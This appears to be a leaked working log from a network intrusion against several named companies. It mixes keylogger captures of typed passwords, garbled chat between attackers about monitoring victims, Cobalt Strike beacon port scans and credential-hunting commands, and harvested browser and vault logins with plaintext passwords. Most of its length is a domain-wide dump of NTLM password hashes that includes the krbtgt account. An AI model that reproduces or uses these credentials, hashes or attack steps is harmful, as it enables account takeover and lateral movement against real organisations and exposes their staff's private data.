Inbox - djarden@waterway.com - Outlook
=======
[delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][up][up][down][delete][delete][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][down][down][down][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][down][delete][down][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete]

``````
Inbox - djarden@waterway.com - Outlook
=======
[delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][ctrl]c

``Basically, this is what it's all about''.
Windows Security
=======
Myoldpassword6*
MyNew[backspace][backspace][backspace][backspace]Myoldpassword6*
``+djarden does it have keylogs?
[-] screenshot from desktop 2 is empty
``And now there's 16-17 hours in the keylog, it looks like it's been on 24 hours``
  CurrentUser : WATERWAY\mharper
  Idletime : 00h:43m:30s:657ms (2610657 milliseconds)
``````
waterway.com



WIN SERVER:

by AD: 16
Alive: 11 (including those without 445)
Attracted: 7

no 445:
    PDITESTSQL.waterway.com
    reporting.waterway.com
    WWSQL2Old.waterway.com
    wwsql02.waterway.com

Destination host unreachable (I pinged from different hosts, this is the case everywhere):
    PDIProdWeb2016.waterway.com
    WW2K1Old.waterway.com
    WWSQLOLD.waterway.com
    WATERWAYDSC02.waterway.com



ARMS:

AD: 294
alive: 200
Didn't ask he cleared his desktop? Slack? Just a bunch of errors, no noise on the mail? but keep monitoring nimble nimble nimble192.168.43.8
192.168.43.8 - Google Chrome
=======
Admin1Vanilla2
Admin[tab]Admin
[alt][alt]

Waterway Gas and Wash - Google Chrome
=======
MyNewPassworx6[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace] [backspace][backspace]]djarden@waterwary.com [backspace][tab][right][backspace]Djarden6*


Waterway IT - Google Chrome
=======
djarden@waterway.com[tab]MyNewPas[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]Djarden6*
``and take screenshots see what kind of movement see the keylogging then monitor the mail for noiseotnoo, the keylogs are hanging, nimbles and mail is opentoo everything is ready?either at night or close at once from noise-mail monitor on the situation nimbles are open as soon as we catch immediately enter through soks with the same machine within an hour after 18 wait for the passkeylog hangs on itishnicksharms to ping, yes pre.bat runtut are we all ready? to the live ones I attributed those without ports` ``
waterway.com

WIN SERVER:

by AD: 16
Alive: ~11
Attracted: 7


1. here newpcforsomeone arm pulls instead of PDITESTSQL
        ping PDITESTSQL.waterway.com
            Pinging PDITESTSQL.waterway.com [192.168.0.127]
        ping -a 192.168.0.127
            Pinging newpcforsomeone.waterway.com [192.168.0.127]

    beacon> portscan PDITESTSQL.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on PDITESTSQL.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

2. PDITESTWEB.waterway.com
        Ping request could not find host PDITESTWEB.waterway.com. Please check the name and try again.

3. beacon> portscan reporting.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on reporting.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

4. beacon> portscan WWSQL2Old.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on WWSQL2Old.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

5. beacon> portscan wwsql02.waterway.com
    [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on wwsql02.waterway.com
    [+] host called home, sent: 93285 bytes
    [+] received output:
    Scanner module is complete

6.  Destination host unreachable:
        PDIProdWeb2016.waterway.com
        WW2K1Old.waterway.com
        WWSQLOLD.waterway.com
        WATERWAYDSC02.waterway.com
    Pinged from different hosts, everywhere like this
I'll try to pick up a log and send them a ticket to ITSport, maybe something will show up there.
Recovery
Creative
```
the disks are on NAS, Danas has access
```
http://172.17.70.232:5000/ qlyons applecherrypenguinski
``````
hqnas2.evo.local
photo-nas.evo.local

``Is it there now? The windef is on-try the dll should already have been waiting for action after the lock)`` Maybe
no it's not there yet or prophylaxis or they didn't throw it out, it's probably the session died of something
us unlikely to have figured out, we wrote above that YES passwords have not changed, just apparently what they had a lag with the authorization oflovid, under the Vpn, but the domain is available[ ](https://mediaeveryone.com/group/evo-com?msg=Dzf6p5uafhY8G45MT) on it like our granddick under the Vpn?
just spunnom upload the load available
HAL.evo.local
HQVEEAMPROXY2.evo.local
veeamtemp.evo.local
``in the center
```
hq-vcenter-2.evo.local
tcooley@evo.local
SammySeveDog44
``Reviewed the bludhound today, you can see that the parallels YES, the closest - changed in SeptemberIt turns out we were not redeemed)in general the creeds have not changed, tried today they are valid. For what reason so is not clear.`https://remote.itc-us.com/rdweb/pages/en-us/password.aspx` on the desktops of the admins saw a change of password, I wonder where it will lead to the creeds ``.
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Nathan ITC\br_admin CAKE@horse369!@@
[*] Tasked beacon to run .NET program: SharpSniper.exe NathanK ITC\br_admin CAKE@horse369!@@
[+] host called home, sent: 113781 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

``This is with the token.
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe NathanK
[*] Tasked beacon to run .NET program: SharpSniper.exe NathanK
[+] host called home, sent: 113721 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

````NathanK - what computers was he on ?
URL : http://itcma-mits01/mitsdiscover/doLogin.md
Username : jasonh
Password : Fall@ITC2020!
``````
URL : http://itcma-mits01/mitsdiscover/doLogin.md
Username : brandent
Password : HGp752308!

--- Chromium Credential (User: brandent) ---
URL : https://login.verizonwireless.com/vzauth/UI/Login
Username : 5746121367
Password : HGp752301!

``````
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : http://itcma-mits01/
Identity : garya
Credential :
LastModified : 5/7/2020 4:03:55 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://remote.itc-us.com/
Identity : garya@itc-us.com
Credential : Wizz3r600
LastModified : 5/4/2020 12:58:26 PM

``````
OU=Security Groups
ITCMA-RDS01.ITC.LOCAL 10.0.0.8
ITCMA-RDS-SVR01.ITC.LOCAL 10.0.0.6
``:thinking:``
[DC] 'ITC.LOCAL'
``````
[DC] 'ITC.LOCAL' will be the domain
[DC] 'ITCMA-FILE03.ITC.LOCAL' will be the DC server
[DC] Exporting domain 'ITC.LOCAL'
1307 infor-test e3a0168bc21cfb88b95c954a5b18f57c 66050
1230 SPInstall ad145b1324989a3f7e1b045626778aea 66050
1232 SPServices 1b3e048d0a40d7c1fac55d6a99297b4b 66050
1304 DHCPDNS dd3f1f083348928ac57db76899e77152 66050
5124 MSOL_ff1eb51ea3ce 98128e43603e7dfdeb1ca559bf8b8256 66080
1642 MainConferenceRoom fe2e8e6e99ac9b05632c831324f708dc 66050
1643 OperationsConference fe2e8e6e99ac9b05632c831324f708dc 66050
5677 AZUREADSSOACC$ 89f488f470b5d44e9b31a762dee94eee 69632
8117 itcmarketing 6aa8a83f5b896d92af48eec925d8714a 512
2146 itccommunications 2ec7b543428ce4cdbde99026428942ed 66048
8191 PCSetup e3f462c08d32e3ba49ed3037037dada0 512
5347 paulaw b1f07bd1d38e076c00b9012f8f20a1a9 514
5297 RyanQ 8850823d1b5bf81b31242f4acd852eed 514
8143 simonw b1f07bd1d38e076c00b9012f8f20a1a9 514
8194 bornz 8574e1d48547de1139bc34ee4afb799b 514
5690 DESKTOP-RCV5PNA$ 5e0ac7ff6f0987a30efeaa03816a9f17 4096
39604 DESKTOP-AE0UUHL$ 7d8b22ab27a2841c7f2994a3eab6616e 4096
40104 ITCMA-WS1025$ 0ca84975a9eeb28c7bcddbf207c520fc 4096
5679 funtech cbe0e0e7bec3a940fa2f18b2b19bb27d 66048
1718 elkconference 69d5ef661299dd1aafa3ff55e0c430c7 66050
5332 ElkProd2 1417dde3ca1f67084b85fcbd6bcc1f97 512
8204 Test_Primary eb6538aa406cfad09403d3bb1f94785f 66048
40105 DESKTOP-07M1VFM$ 6caaa5a92aa3c25fe10a60af41b871e5 4096
9110 eglchina 08b0ec954a94d3c7f1824957bf3fde72 66048
6604 ITCMA-ESXI03$ ec4af0abf49ecbcc062d5d2f9b534c3a 4096
40129 phoebel 4eea3619d2e635f527a3eeb5d4810253 514
5219 ITCMA-WS1064$ a5213099145a2f4b4e4ac46a3a315cda 4096
9126 ASITC-WS0040$ 851577386ab6a8ec5a84d6a84f9b1b3 4096
40111 tigera 565b89a26b92e552143b5ab2d1643469 514
9127 ASITC-WS0044$ 6ecaee8af623e5576c5f016cedfa3dcc 4096
40146 ITC-CK-PC$ 0d343cec8d448c0c6c45b2dc0bd037d9 4098
5218 ITCMA-WS1065$ 5a3abb44e287f90fae60f11c832ee53a 4096
40162 marilynp e62830daed8dbea4acd0b99d682946bb 512
5301 AustinZ 565b89a26b92e552143b5ab2d1643469 514
9111 kevincopy 2bc2a0308594f2e7481db79c9904e160 514
40121 masonl 7e5792cca8031c0d2dc2c576be8d02e9 514
8139 AndyG b1f07bd1d38e076c00b9012f8f20a1a9 514
40113 janiel 535baf9cf1c3067f9e952cc093f47cea 514
40109 kellyh 08b0ec954a94d3c7f1824957bf3fde72 66050
40106 KimJong 08b0ec954a94d3c7f1824957bf3fde72 66050
40114 navyw 7e5792cca8031c0d2dc2c576be8d02e9 514
5224 elkquality e62830daed8dbea4acd0b99d682946bb 512
40167 rogerm 950a6742fc3da61d118438d1728d604f 512
5660 ITCMA-WS1097$ d348eed65814c1a1f72606d6f07bfac1 4128
39634 ITCMA-WS1095$ b884941346dedaf6d219ba05a51e1753 4128
40119 ITCMA-LT1025$ 6310bb849025ed7b333dd355d1740220 4128
6609 ITCMA-LT1007$ f1e56d0a051db1659a732e6beac8dea3 4096
40176 elishav cbfbcd678b17a8e90ead8638a26eb79c 512
39610 svandyk ed3ccdc38762122a9271c5208d47a301 66048
9119 ASITC-WS0031$ 2c994ffb54b64ce1034ad7a7b8a1db34 4096
9198 ASITC-WS0034$ 6b76cf6737a0e543376191ac3298fe10 4096
5111 ITCMA-WS1021$ f70868955a189abd9cc466e4c01791ba 4096
40117 evany e62830daed8dbea4acd0b99d682946bb 512
39680 PassPortalTest4 d8043111423e997954d32ef405d8ba4f 66048
39678 PassPortalTest2 75bf1e74747577ac3cc3022b8024b5d8 66048
39679 PassPortalTest3 ef188f6919861aa64419642984d21864 66048
8112 ITCMA-WARROOM$ bf3d3790654619faca38a562bbfc38d5 4128
9124 ASITC-WS0071$ aebe58ae5dad870b4000ae5ee82a76bd 4096
9189 ASITC-WS0032$ 8ddab2c440184c51cfa52715d4f11c63 4096
39633 amazonfba 38f41f2e718ae51efb693b25fb45ed49 66048
5327 ElkShipping 85a60283d2ff2fbd2d40badac9f8a0fe 512
40157 jessiel 8d0f1edbb9f7ea4bbf078827f1cde656 512
5671 ITCMA-LT1064$ bb74c335daff931f17adf9dd73dd0507 4096
39683 nbktest 18fd0c3e7f5d1485e5e46b86f4923ae3 512
40163 mollieh 70e19f6d815e259d52e69172094dc503 512
39664 rachelt 740f70197f2cf7ce6f4e10ca6de5f8c0 512
5208 infor_edi_old 1941c372c3c802defa0af03fddf10c04 66050
5341 sophiac de43e1dcc48916c8096fd857d9619292 514
39612 richb 58aa5e467abb3c5961b0f82ba20782a8 514
5682 laurenj 92670f877d5c6b94abcbb85de50dd647 514
5662 kristaa 8574e1d48547de1139bc34ee4afb799b 514
8172 KatieD 8574e1d48547de1139bc34ee4afb799b 514
5622 DanW eb450fca0a5bed7a5417b5cc9f7d295e 514
8145 AlainaB ba41503f5187aa6f2fbbd576b23b9dc9 514
9118 ASITC-WS0030$ 6db7e0cdcc84e6880df1dff0e9d80dcf 4096
1328 ITCMA-LT1018$ 147b80e8897d09b07ffdc0a898624336 4096
8147 RebeckaC a64795a7d05999a0c2b429586799325c 512
39651 nancyk a64795a7d05999a0c2b429586799325c 512
40115 chaoq cebf8373c4e81a3109faa4043db329d9 514
40149 jerretts e485bbd13a37e4c01272de95d4b644e 514
40161 carlosl f02f1e684771ad51a908ca043ce09733 512
39677 PassPortalTest 589b85762d8ab451401df29aa7fdc417 66048
39686 itccorporatecalendar 589b85762d8ab451401df29aa7fdc417 512
5294 MarkH 7e8c067a506d3190fca59fd3fc61de61 514
1637 Donnettaw a477358010d4eecc48a114f8b7bdb105 512
39681 kellyb 81bb9e0d650df6876cb9dacb2586b505 512
40182 ITCMA-LT1022$ f83f07b0ef6a2600d91ba1fcbdd3d6a5 4096
2205 ITCMA-WS1024$ a1d33625bce1fb2b27236a67b1bd3325 4096
9212 ASITC-WS0096$ 841ca8f92e93e1bad2c4a11412450e8a 4096
39695 ITCLab2 bf1956f6cdff81985e99edf817ab218c7 512
9129 ASITC-WS0013$ bb1df45881daa0a52109b7694c8d4c0e 4096
40178 ITCMA-WS1028$ cf129aa3bbbc16d90669cd646a453bfe 4128
9190 ASITC-WS0001$ d85302272ad9fccfa85ab06cfac2944a 4096
40174 jerryt 32b8ba6aaecbe2d456f2076012541e74 512
9216 ASITC-WS0097$ 8c8a0524e9cab69c33693891c4be7670 4098
4612 ITCMA-WS1054$ 8ff55e603b1249172edfaf3e5de18a7f 4096
39647 PRODuser 317e1d6c0c4eaa48b331df1a6310060b 512
5201 ITCMA-LT1030$ 4b9f8a314c36ce60329ebaea441fee84 4096
5236 galenw 70586bc2191f0a0872798bcb30c7fcdf 514
5277 ITCMA-WS1077$ 647829b8512a3810780c2fd4fe66f96f 4096
39698 edwardm 3a37fbb6f2020618ebf9a8bab1f64dde 512
5618 ITCMA-WS1074$ 8b3c8ea7623bba2bb3e041a548e0a792 4096
8158 ITCMA-LT1066$ 9419e85545da2871cb542501b4cf0be2 4096
2210 ITCMA-WS1061$ 7fb0b7230dc444f3ebc6e3c6c418a697 4096
5637 ITCMA-WS1087$ f01ed101778a0235811623ddd954f039 4096
40152 maxwellm 273ca5b7b32220194ff7657572bc2a02 512
2218 ITCMA-WS1073$ a6cf4f5d9f9c6b59c7a972d525449e90 4096
2215 ITCMA-LT1032$ 0600883b7fbe72cd3afe33b2781e50b9 4096
5298 c59efdbb56e56613ecd45db5787b04da 512
5330 itcma-ws1091$ 1933cf26ff46aee9e3898ebac4936237 4096
9142 ASITC-WS0075$ 75233948358758b4dd0282f50108824e 4096
39697 juliew 7d7883ad4dfafde4fd3d3811f8100167 512
40180 ASITC-WS0098$ 3b7e9417b27ac5752872171fe45e37ba 4096
9201 ASITC-WS0093$ 3f142e51193e786dfa669a832ee1e392 4098
2147 ElioCommunications 2ec7b543428ce4cdbde99026428942ed 66048
39694 itclab1 0ea4a865b25888558a0ae8b04c6f1162 512
5678 it-imac$ 5e57fc72f37055885756da33f1e76e29 4096
2113 CoreyB 6578de80fdfdf6e2b607eadfbb189810 544
40175 dasmondr c4dfe7c00de60ce6303229ff20a56b8b 512
40158 theodoren b88ff38608970d449d0ea007b9cefb5d 512
40151 karenh ad1677745d36039bcfc0794be2a6cf94 512
1695 thomasl dff852fcb8a279afdcfa4e005b1bacc8 514
40138 martinh 70586bc2191f0a0872798bcb30c7fcdf 514
40116 tinayu 65d75e5a9d12ad87369cc0cb3b230dab 514
2157 ITCMA-VCEN01$ 5eca2e6d3c301ccabced38191da6e644 4096
1724 Royw acbfc03df96e93cf7294a01a6abbda33 514
8155 IvanY cebf8373c4e81a3109faa4043db329d9 514
39632 timy cebf8373c4e81a3109fa9fa4043db329d9 514
39649 andrewz 535baf9cf1c3067f9e952cc093f47cea 514
9112 ASITC-WS0051$ 5a86180ad668883a48ad7b207fb92905 4096
40150 dennisc b5d62c1224046538a3fc5ee33f26b378 512
40153 michaelc 7909b2d24e607f4f2fd7881160049700 512
40160 jamesp fe50873f72b94169590015cb59630456 512
40159 maryf d8f2665dd17622f840d7127a250338a1 514
9161 ASITC-WS0069$ 7481e6e9fe8486e1034ab06500260070 4098
5621 ITCMA-WS1078$ 357235dcf1bfaebd7e0d22f2a3e52a93 4096
1129 dickh 1c7866f2a9f7ab1d6601443f65512f69 512
2169 KippU 6fbf03d408766a59be6156df406d27b 514
9188 ASITC-WS0046$ 840beaac0c660294b355fbb97ec7b787 4096
1654 kirto a64795a7d05999a0c2b429586799325c 512
8108 OliviaM 83693bd82d5287fa53329e244f2b5bc0 512
9139 ASITC-WS0021$ 5663ec743caf9f7388488b2ad4b8d945 4096
40155 jaredn b12d1fb1d52ee2de7285261d1401da83 514
9225 ASITC-WS0125$ 285f9f9f26cc7d4fe900b722093c731bbc 4096
8130 ITCMA-NAS02$ aee317af072ee03f7617bc92be21e602 69632
9205 ASITC-WS0016$ a302e93852de55c7ba4c2840670215f0 4096
40165 elizabeths 362c54be8465845c2e2e1ee6ad3f89a7 512
1120 lindak 2bc2a0308594f2e7481db79c9904e160 514
1246 dawns a64795a7d05999a0c2b429586799325c 512
1207 shellyb a64795a7d05999a0c2b429586799325c 512
39702 ___VMware_Conv_SA___ 440e42204080d9d1808de1c706d6c165 66048
1215 ccwong 3eddbeb8fbbb24ad3145b1bb7efeee41 66050
1264 Factory1 36e12e09c91d45fdc66488df3d5b2baa 66050
1322 julianl 8277d4760aba9737afdef8deee04d800 66050
1257 leonc e3a0168bc21cfb88b95c954a5b18f57c 514
1310 Lilyh 175cb278577dab61c02b1b20f68075c2 66050
5143 shmalyr cab165b1381d8f2fb1284181a8d79a2d 514
2202 kennyc 0fe26ffc5107e4b20c5a1a1a90d6368c10 514
1242 SSL_Admin fe0cd4846440dbb281d30949283d32d 66048
5207 support_edi 47a01baef13f7dd7065e9418d962e128 66050
5229 MichelleG 3910589ae3080bf99f0faf5aedf6bcd3 514
5237 LPadgett be8410683e173bc7eb4d4983016d4df5 514
5274 support_pj 525a8ecb2bd7de7b9f21cdb27901acf7 66048
1726 Andrewl 1d842980d5b71e8dc94627f47f17fd3e5 66050
8106 janec ceac614e57e88a8cf43196e05bcb6e70 514
5328 FairyY 568d109272f3aa9a1de5460a26e0b3d4 514
1153 elkwarehouse2 e37bf2e00afb4d3cac811f26f52d9ca7 514
5135 Rickc 7535e15737dc6a6f9dbbdae6164687c1 514
1697 gloriak 1b7f0e3eb4a557a2acbb426852337c42 514
1266 stevenj f199f4354f200b30497f70aa76e86a2c 514
9138 sh_admin 433f858db8d9cad2334051f378c37ddf 512
5245 ITCMATEST e39f2af4d496348f1ed435ca236fc1cc 514
2150 michaelb a56c8954f922afb90fa3b92e7525fb19 66050
2209 kellib b48f1b5491446d29af4ac03a7425cd1c 514
1117 brianp 1304285dadeee9310ec81148b05bb5dd 514
5137 annetteh 87588e1455da040d8b49953d79921b4a 514
2134 bu_veeam b27c2ff6c11408721a28f0a4f6f16a83 66048
41105 aadsync 0cb6232407ea46c3d3f704cba48c5f56 66048
39660 PassportalSync 978f9dd19c43883714f73acd99500cb0 66080
5241 passwordnotify$ 182e24b2711b192713ef950fc1c0ed7f 4096
6607 egltech f5c2d037fbddf81469809c06802c4acf 66048
8156 SLETest 35a2a46fa8d8b8578d7502ae53c42272 512
2198 ITCMA-LT1029$ e78b195fdad2c2910c952221ce5da765 4096
1684 kenw 337fc9e65995c5c4fbfea451346b1df6 512
5670 ITCMA-LT1063$ 7b87606f1a9f613a0d830ea2ef0c82a3 4096
5343 warehouse3 16687489c6824897f2585c58fb345ad2 66050
40166 josephr f4bd4fda1036ee1fad27d0d9ef61ce1a 512
1614 superlogin 29812263b384df487b49ca82f3b4be48 66048
40144 advpn 08b0ec954a94d3c7f1824957bf3fde72 66048
5112 ITCMA-WS1053$ 4b8169fdf3158798a4fcb70e1efd78025 4096
1130 garyl 9101d0697357be9c6b98b784f9ccf979 512
5283 ITCMA-LT1040$ 11826271c727134f1092458c333df6e9 4096
1640 LynnV dc4468f73da3ad8810c65829e76ff826 512
40172 nicoles 32e238f08016761a5be98cd1ffd40070 512
1116 denniss 6681a0025a1066ee85ffee6a9f53a2fd 66050
40173 andrewr e116c5d8e0df37e1bc56100fdc069014 512
40197 jamies 1c49c9cc354ee8c1cef58c9193be2344 512
5658 tonyk 80eb29c49eebac198658d488970fcd8e 512
9193 ASITC-WS0009$ ee58fb1dcdefc20f1f81868c21522f87 4096
9150 ASITC-WS0063$ b2dd61db2862f89990834fc039e32f95 4096
8201 alicew 74793827f352c557c04a4da6a607adb4 512
2155 hky 81a4511c75e09afaf04bb0e28a7ddce2 512
39675 lorencec 91578f59a0caeaaabb0b5a2370ded6b1 512
8199 ITCMA-LT1028$ 81fb2eb37a0f2e911c7b0313d3ca73ae 4096
40170 adrianar 878691045748baa727bea9882c13eafe 512
9152 ASITC-WS0039$ 9f0043969a59b02b23f7847cebc6a628 4096
40200 hannahc c90c4669684f518d36771155d56f3ea2 512
5665 ITCMA-LT1057$ 2e4fb682d249cf53e7049a299aabce5a 4096
39611 egladmin d64655136d7f93780715bb1a83f7b40b 66048
40164 leonr dc85c733b853158f3dc3346f19fa78f9 512
1251 UPSAdmin d54feab3ae1cd743c74bd79e9c63aa36 514
5276 ITCMA-WS1076$ 044197422e06f63efe35a9ac8c249290 4096
39676 ssoadmin 3e4ec6517ffcc07a51059ebe8b9a05f4 512
9187 ASITC-WS0055$ 5745fa49aaa4a565eab048edb15910d8 4096
40156 angelaf 768139be80286a507b64b80eba0d4dd5 514
40154 davidh e62830daed8dbea4acd0b99d682946bb 512
40168 daniels d5993216e22e22e06efaf21d076b8c3f8e3 512
2164 jamesm ba4e5946331fc545914ecc9cbc8a3b53 512
39662 paustin 32ba59e63c228fc531b6e14a370d72ba 512
502 krbtgt 81e28a7bf06c3bff02feee793bcab78a 514
1151 warehouse1 67e4c62179d56d0f922105ee5681282c 514
1340 ITCMA-LT1020$ bd9a72e6b1d7e261d75b1cc6e26d4791 4096
40123 ITCMA-LT1075$ b82a59b0c5dc2046905ed60aa6ed25d9 4096
39668 ITCMA-LT1027$ a2dd537e33316e38637bc3e59df222b4 4096
41117 WINDEV2004EVAL$ c0334b629816e40e72731aabfbb0a973 4096
1694 angiel 33a26f76c61382ae500caccbca82803f 514
40135 kristiev 2f3efe73d291da6e7ddc9b54c238c308 514
41116 chrishoyt 25f900466b55ec728305c13027d24022 512
41115 terrin f9ee54b70f789caa6dd292c307a6250e 512
9219 ASITC-WS0113$ ac138f958fd09c5d7c28923be16b4f14 4096
5291 ITCMA-LT1041$ 7a67bdc20dce79ff44ce97d9fdc30c1d 4096
1231 SPFarm cc9bf398b6e637a2e7f708ea458c2105 66050
9226 ASITC-WS0128$ 3db5793500addec855f3787e33922c6d 4096
1313 sslvpn 0530e010fd31ed782ec4fc0d79231c5a 66050
39613 AAD_4e4f0fe8f058 08b0ec954a94d3c7f1824957bf3fde72 66048
41104 AAD_ee11aef66e2f 29311b26b9f3ef13e822d3263e4fa38f 66048
1138 dank 1a487688d1beba344274d40af2b7707a 512
5314 ITCMA-WS1090$ 074587b98978eb67005a7041f2851c38 4096
9223 ASITC-WS0108$ efc5c2fa304ecddacd8f4cf78c331290 4096
41108 testing 3e85d5a1410e277a4e7084c253810157 512
1337 deang 73d9e66b9131e12f52c441e208deaca0 66048
40206 micks ac2ac419036fd91e05aac746c8660a55 512
6608 vmware 3b224b954ae6a5bfca10a1c8688bfbbb 66048
8144 ITCMA-LT1060$ 660048976bb4b1cb09c26d89bbd1de2d 4096
8113 ITCMA-WS1098$ da533071e958348308f4e8ed581ec335e 4096
8168 Misc01 f2d429b35f633b12eefbee498aafbad2 512
2189 ITCMA-LT1026$ 92ff8ee0302d42f44d6f29de25760b45 4096
39629 ITCMA-LOANER1$ d7615b90d36bb108ead3e08ff636cc9c 4096
5174 SLEAdmin b28bc7ab76873471029a9ad657f75d18 66048
8185 Survey 7c5282ddad27303ae14390a5dde567f9 512
5293 ITCMA-LT1043$ 01363845f89c79d100b3ce008d9ddbe7 4128
8153 JessieC d92029926067bd7fed56b72ffda8e62a 512
5192 ITCMA-WS1027$ 4f4f2bf597a258f7e68d53ed59f2ca4c 4096
1240 PaceJet 06af9d10811d1951f7afd09efbebf6c6 66048
5633 MataC edbeb07a3c05e55b8721ac23f294bcb2 512
5669 ITCMA-LT1062$ bd08015476bc185b984785efbff43bf7 4096
39630 michellew cef2eb521883d390b32b0b5bb916f7bb 512
1127 lorin 7c8566e384468b76fe9c11f5ef635422 512
40120 timothym cef2eb521883d390b32b0b5bb916f7bb 512
39628 ITCMA-LT1073$ 04fba433f154bc3b66b780f110a64bac 4096
5216 ITCMA-WS1062$ e622588e1a0b5bfcac19cb13cc0296b1 4096
1689 rachelp 9a4c3fbbf6e6b1fe805d0ffc7378f0d9 512
9144 ASITC-WS0084$ 4b897158c8ef783510626ee501d67a23 4096
5648 warehouse2 1628488e442316500a176701e0ac3c54 512
40204 ITCMA-CR01$ c683d967ce29df38afbd1eff4f69e9f2 4096
5338 EricG 98884d9fd2e6def74cbb7bb34bdd650f 512
9211 70586bc2191f0a0872798bcb30c7fcdf 66048
9217 ASITC-WS0101$ 6dc65547a71877b96f32eb43fbf8eacb 4096
40133 hudreceiving 1d32ad40cecbc0419f99a08e0845dd66 512
1715 bdf0593666f4484c2860800af6834eb2 512
9199 ASITC-WS0010$ 343a3b47f144eb6784cf1f86893ad207 4096
9121 ASITC-WS0036$ aed48f171fd46be32ae4a4269032653a 4096
2141 linconf 4c3879fef394fa5dce0037c197c70841 512
1698 ITCMA-ENG01$ df61c05ce9fd0f68a79a6006bb7b0f26 4096
1716 flexlight 984cb3817e444c7e325ad0c4a471a74f 512
5683 ITCMA-LT1068$ 7a94bf2ca843c714bb1e69b840fafb80 4096
1665 ELKUPSUser dc4b02eb894f18b53d78197c8ffe024c 512
5308 RichW 8195790b740761023b7e34280db878c5 512
1219 tomh 78dfc14107c931f730bce53b47dee641 512
5627 ITCMA-WS1080$ 708ad4a3223993991427f33b6aea5da4578 4096
1277 trentr 589b85762d8ab451401df29aa7fdc417 512
1122 dickc 602a9783f3aa3422f2697b1115da27f3 512
2188 BradB dba247aa9535f1d877062d139d04a46a 512
8195 ITCMA-LT1070$ 02fd6908bd6d78b6b35b399d3e74517f 4096
5348 itcma-ws1094$ 03ab2b6c8260c6c5a89bb1dae3f2ae9f 4096
39621 ITCMA-LT1045A$ 652249fc223d285ba5b1df3251c192dd 4096
5324 ScottW 0d242248fffaa41f252e6208536793e9 512
8119 JonR 6c71c63361f9dc21a430202ab51778ec 512
8188 grantc 5bbe84fdc0909a8bf546a43a0e8f51f8 512
5691 ITCMA-FILE01$ 0432a09dab08a33ae21a840e783b5b5e 4096
4610 ITCMA-LT1024$ eae3eede976d2eb45dd3f3fa53df50f1 4096
6617 ITCMA-LT1090$ 9c2d2a7e1bf5a2400e3b9fbf6fb9f773 4096
8137 TroyR 74ff53312573ba0b4c14a02e699bc783 512
5315 ITCMA-WS1085$ 880db01931a6af925d9e16be8df4152b 4096
9151 ASITC-WS0052$ b6d0bdf0d33dd8ff2a4bfb6eff0f232a 4096
39661 jacobc 94629c257cf1c3484f7ce4b958d58465 512
9156 ASITC-WS0085$ 50db7ddeb7f9330fb46080c77e3e57f0 4096
40112 7dfe93aa1c69e0babe9f47d13f1244e1 512
9165 ASITC-WS0053$ 4db8640f43556b8bdaf26aada8701513 4096
9153 ASITC-WS0057$ 0258d1a53e8dbdec225c8dd4968d604e 4096
8138 AdamY f91c84f965aeaa6fa40061c2abf6015a 512
9213 ASITC-WS0092$ 77c16a86697dd4b86e34338d732240df 4096
9135 ASITC-WS0079$ 074ed936013417af38e68eac259455aaa 4096
9169 ASITC-WS0087$ 71c821d37d1ad6b1ad0c470819d55ecc 4096
6616 krist 589b85762d8ab451401df29aa7fdc417 512
40136 maxz ddf78b035828826e543a46b39136e719 512
40140 sonicwall_sslvpn 68d8b93b306e84fbc9cafbdc4862e2e45 66048
5345 CharlieS 8b614a4fa418d5dba77fe0507be8198f 512
9168 ASITC-WS0022$ 2cc6319c387e51328fec80047fda3980 4096
1290 rickyc 89999c3eb657280f275c08e2053ff9 512
9186 ASITC-WS0008$ d4ff1162d4facc94781f959a1fbb5941 4096
9164 ASITC-WS0062$ f4fdab0da2b779bdd983bc2d46611985 4096
9202 ASITC-WS0083$ 0643a9a9a37b5e27d2cd214b646f6b66e6 4096
9200 ASITC-WS0017$ 57087e094812b9580cd506a0c4b26393 4096
9157 ASITC-WS0065$ 28df06b223c9d6d67127a5eff355f250 4096
9183 ASITC-WS0076$ 4419874956a21e8bc8b94415a69caa1d 4096
5116 nickn 5ad8dfa79777ae85e3a9198994afc79b 512
9180 ASITC-WS0003$ b1a85968fc759735ff51fcbdfbacdf75 4096
1723 Vincenth 77821fad0a661be0ba6605ad032bc674 512
1227 9d9f65e7770f2eb4a9a9922785a37026 66048
39641 jendyl ac73e3569312c470c1173050f9763713 512
5141 ellisq ef5a55e8e2c597fb2274a0db179de291 512
9143 ASITC-WS0012$ c2aa049aca815fa017ceb9b35ac573eb 4096
2200 ITCMA-RDS01$ c2b76ea483a7b734fe9b809c505454b1 4096
5651 MartinZ 1d0c3a53e095f1de8aeac193fc50a1fc 512
9158 ASITC-WS0066$ b5790d71ccb65d5f0a173dfa6af9f5e7 4096
9163 ASITC-WS0058$ 785c911425e4dba6650253bd2e6adfa4 4096
5307 SpringL 4c3879fef394fa5dce0037c197c70841 512
9149 ASITC-WS0042$ a2e739b1a844c342cd53b990e30349eb 4096
9182 ASITC-WS0060$ 374be92c8d690faf9152ecabcee56bb8 4096
